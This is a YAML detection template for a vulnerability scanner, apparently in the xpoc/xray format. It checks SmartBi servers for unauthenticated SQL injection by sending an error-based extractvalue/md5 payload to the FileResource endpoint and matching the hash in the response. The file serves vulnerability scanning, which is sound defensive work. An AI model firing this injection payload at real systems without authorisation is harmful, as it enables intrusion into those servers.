id: smartbi-unauthenticated-sqli

info:
  name: SmartBi 全版本 SQl 注入
  author: xpoc
  severity: high
  verified: false
  reference: 
    -  https://mp.weixin.qq.com/s/yeMhVYJks_wf6Po-sA6iOg
  tags: smartbi,sqli
  created: 2023/07/13

set:
    num: randomLowercase(5)
    md5num: md5(num)
    subst: substr(md5num, 6, 28)
rules:
    r0:
        request:
            method: POST
            path: /vision/FileResource
            body: op=OPEN&resId=LOGIN_BG_IMG%27%20AND%20extractvalue(1,concat(0,md5('{{num}}')))--+
        expression: response.status == 200 && response.body.bcontains(bytes(subst))
    r1:
        request:
            method: POST
            path: /smartbi/vision/FileResource
            body: op=OPEN&resId=LOGIN_BG_IMG%27%20AND%20extractvalue(1,concat(0,md5('{{num}}')))--+
        expression: response.status == 200 && response.body.bcontains(bytes(subst))
expression: r0() || r1()